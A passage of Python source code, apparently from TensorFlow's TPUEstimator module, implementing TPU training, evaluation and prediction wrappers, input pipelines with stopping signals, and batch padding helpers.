'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_savedmodel()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _REWRITE_FOR_INFERENCE_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if self._log_every_n_steps is not None:
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if self._log_every_n_steps is not None:
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops),
InstallSignalHandlerHook()
])
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if self._log_every_n_steps is not None:
logging_hook_frequency = ( # Divide and round up
(self._log_every_n_steps +
self._config.tpu_config.iterations_per_loop - 1) //
self._config.tpu_config.iterations_per_loop)
hooks.append(
training.LoggingTensorHook({
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=logging_hook_frequency))
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_train_step,
[_INITIAL_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
